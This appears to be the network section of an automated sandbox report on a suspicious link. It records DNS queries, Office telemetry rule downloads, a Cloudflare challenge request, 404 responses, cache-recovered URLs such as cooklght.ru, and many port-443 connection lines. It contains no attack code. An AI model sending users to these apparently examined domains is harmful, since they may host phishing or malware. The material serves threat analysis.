    Source: global trafficHTTP traffic detected: GET /rules/rule702301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule702300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule703400v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule703401v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule702501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule702500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule700501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule700500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule702550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule702551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule701351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule701350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule702151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule700751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule703000v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule703001v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule702150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule703450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule700750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule700151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule700150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule703451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule700900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule702251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule702250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule702651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule700901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule702650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule703101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule702901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule703100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule702900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule703851v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule703601v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule703801v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule703600v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule703850v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule703800v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule703700v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule703750v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule703751v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule703701v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule701300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule701301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule704050v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule704051v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule701701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficDNS traffic detected: DNS query: www.google.com
    Source: global trafficDNS traffic detected: DNS query: alinefrasca.sbs
    Source: global trafficDNS traffic detected: DNS query: challenges.cloudflare.com
    Source: global trafficDNS traffic detected: DNS query: a.nel.cloudflare.com
    Source: global trafficDNS traffic detected: DNS query: cdnjs.cloudflare.com
    Source: global trafficDNS traffic detected: DNS query: cooklght.ru
    Source: global trafficDNS traffic detected: DNS query: cdn.jsdelivr.net
    Source: unknownHTTP traffic detected: POST /cdn-cgi/challenge-platform/h/b/flow/ov1/101271322:1730103188:6HRbbJs87_HiCSIrxrZZgbsUH28xnY_4sVI_cjvAKEk/8d9998e48bc0e98b/S8ymOwDctYV1XFZLWDWFqSNHTXkEi0WpttSETzX6a4Y-1730104576-1.1.1.1-_4T1_B3uixuUg0D4_NLdSkm6NbVh1yndlqULNzvY0xOHel8g6vvphEUB.BRwm5rE HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveContent-Length: 3281sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Content-type: application/x-www-form-urlencodedsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36CF-Challenge: S8ymOwDctYV1XFZLWDWFqSNHTXkEi0WpttSETzX6a4Y-1730104576-1.1.1.1-_4T1_B3uixuUg0D4_NLdSkm6NbVh1yndlqULNzvY0xOHel8g6vvphEUB.BRwm5rEsec-ch-ua-platform: "Windows"Accept: */*Origin: https://challenges.cloudflare.comSec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/50l31/0x4AAAAAAAySkc1zVXc3ztAP/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 28 Oct 2024 08:36:19 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecache-control: private, no-cache, max-age=0pragma: no-cachevary: Accept-EncodingCF-Cache-Status: BYPASSReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tWDJGVbsRup9wEhI8G2C6JBLwORuljVlhy5aGB2I7LpDzpfC8LmIaVaoPSXEVkF9yuPp%2BpSMcGHQE3kqmLYXvbmfzz3oPnw13mj8%2BDJpZaq4QwWYQ7VahPAAB5lKL8bmzBU%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8d9998f4cfe74769-DFWalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=965&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2836&recv_bytes=1216&delivery_rate=2979423&cwnd=251&unsent_bytes=0&cid=50fc750356b0b11a&ts=7979&x=0"
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 28 Oct 2024 08:36:22 GMTContent-Type: application/jsonContent-Length: 7Connection: closecache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0cf-chl-out: GPYR/btNPkUhbrx2dNewh8qTSK5K5ozzZCE=$bqyc/J3vPlMdjFunServer: cloudflareCF-RAY: 8d999907ba766bf2-DFWalt-svc: h3=":443"; ma=86400
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 28 Oct 2024 08:36:27 GMTContent-Type: application/jsonContent-Length: 7Connection: closecache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0cf-chl-out: EkhuEKPWgOvp4z7CX1dCnxi+lzH/aQqjfyI=$dR43GxV8Pj44lSU2Server: cloudflareCF-RAY: 8d99992ac96b3aaa-DFWalt-svc: h3=":443"; ma=86400
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 28 Oct 2024 08:36:35 GMTContent-Type: application/jsonContent-Length: 7Connection: closecache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0cf-chl-out: BZhc6AkNbS45rZJz3vqK8xRy3UN3psfkuqM=$1PEbeCTnvwlHQdWAServer: cloudflareCF-RAY: 8d999959bd342e61-DFWalt-svc: h3=":443"; ma=86400
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 28 Oct 2024 08:37:10 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecache-control: private, no-cache, max-age=0pragma: no-cachevary: Accept-EncodingCF-Cache-Status: BYPASSReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wU86ZkLChHGwsGXE7iVMwUH4zwTrzKODgoeTBUCkRFC%2FN77LdGcTyfToJ3FFEFE08SIJJZd%2FULcl%2BAFOXmP3cxNffWx5xEW2eVvOkQofnLEj8cyoSShA5Bm799Ml%2BA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8d999a30ead9466c-DFWalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1045&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2824&recv_bytes=1157&delivery_rate=2661764&cwnd=250&unsent_bytes=0&cid=66bfbf0fe0f71cbf&ts=494&x=0"
    Source: chromecache_90.2.dr, chromecache_69.2.drString found in binary or memory: https://cdn.jsdelivr.net/npm/bootstrap
    Source: chromecache_90.2.dr, chromecache_69.2.drString found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.5.0/css/all.min.css
    Source: chromecache_90.2.dr, chromecache_69.2.drString found in binary or memory: https://cooklght.ru//
    Source: chromecache_90.2.dr, chromecache_69.2.drString found in binary or memory: https://cooklght.ru//#contact
    Source: chromecache_69.2.drString found in binary or memory: https://cooklght.ru//#inventory
    Source: chromecache_90.2.dr, chromecache_69.2.drString found in binary or memory: https://cooklght.ru//#services
    Source: chromecache_80.2.dr, chromecache_77.2.drString found in binary or memory: https://fontawesome.com
    Source: chromecache_80.2.dr, chromecache_77.2.drString found in binary or memory: https://fontawesome.com/license/free
    Source: chromecache_93.2.dr, chromecache_91.2.drString found in binary or memory: https://getbootstrap.com/)
    Source: chromecache_93.2.dr, chromecache_91.2.drString found in binary or memory: https://github.com/twbs/bootstrap/blob/main/LICENSE)
    Source: chromecache_90.2.dr, chromecache_69.2.drString found in binary or memory: https://instagram.com/cooklght.ru
    Source: chromecache_90.2.dr, chromecache_69.2.drString found in binary or memory: https://linkedin.com/in/cooklght.ru
    Source: chromecache_90.2.dr, chromecache_69.2.drString found in binary or memory: https://x.com/cooklght.ru
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49865
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
    Source: unknownNetwork traffic detected: HTTP traffic on port 49817 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49864
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49863
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49862
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49861
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49860
    Source: unknownNetwork traffic detected: HTTP traffic on port 49932 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49898 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49875 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49852 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49795 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49859
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49858
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49857
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49856
    Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49855
    Source: unknownNetwork traffic detected: HTTP traffic on port 49841 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49854
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49853
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49852
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49973
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49851
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49972
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49850
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49971
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49970
    Source: unknownNetwork traffic detected: HTTP traffic on port 49967 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49909 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49943 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49849
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49848
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49969
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49847
    Source: unknownNetwork traffic detected: HTTP traffic on port 49886 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49968
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49846
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49967
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49966
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49965
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49843
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49964
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49842
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49963
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49841
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49962
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49840
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49961
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49960
    Source: unknownNetwork traffic detected: HTTP traffic on port 49966 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49828 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49933 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49805 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49839
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49838
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49959
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49837
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49958
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49836
    Source: unknownNetwork traffic detected: HTTP traffic on port 49921 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49957
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49835
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49956
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49834
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49955
    Source: unknownNetwork traffic detected: HTTP traffic on port 49887 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49954
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49832
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49953
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49831
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49952
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49951
    Source: unknownNetwork traffic detected: HTTP traffic on port 49839 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49864 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49950
    Source: unknownNetwork traffic detected: HTTP traffic on port 49944 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49910 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49853 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49796 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49955 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49829
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49828
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49949
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49827
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49948
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49826
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49947
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49825
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49946
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49945
    Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49944
    Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49822
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49943
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49787
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
    Source: unknownNetwork traffic detected: HTTP traffic on port 49922 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
    Source: unknownNetwork traffic detected: HTTP traffic on port 49945 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49968 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49807 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
    Source: unknownNetwork traffic detected: HTTP traffic on port 49885 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49899
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49898
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49897
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49896
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49895
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
    Source: unknownNetwork traffic detected: HTTP traffic on port 49862 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49894
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49893
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49892
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49891
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49890
    Source: unknownNetwork traffic detected: HTTP traffic on port 49897 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49911 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49957 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49851 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49889
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49888
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49887
    Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49886
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49885
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
    Source: unknownNetwork traffic detected: HTTP traffic on port 49863 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49884
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49883
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49882
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49881
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
    Source: unknownNetwork traffic detected: HTTP traffic on port 49840 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49880
